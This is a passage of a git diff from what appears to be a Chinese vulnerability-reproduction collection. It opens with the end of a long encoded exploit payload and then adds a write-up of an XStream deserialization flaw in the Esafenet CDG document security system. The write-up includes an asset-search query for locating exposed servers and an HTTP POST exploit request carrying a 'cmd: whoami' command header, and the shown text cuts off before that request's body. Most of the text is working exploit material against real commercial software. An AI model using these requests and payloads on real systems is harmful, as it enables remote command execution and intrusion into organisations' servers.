+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605008893-3649fb98-cab2-497c-953b-45f362a07527.png](./img/tK-eUSHk6FfLxBID/1706605008893-3649fb98-cab2-497c-953b-45f362a07527-559003.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mfx9qpu6zsf9hfxv>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..9a68c0d
--- /dev/null
+++ b/亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/af7dsU7CiKjv9PIM/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-986219.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
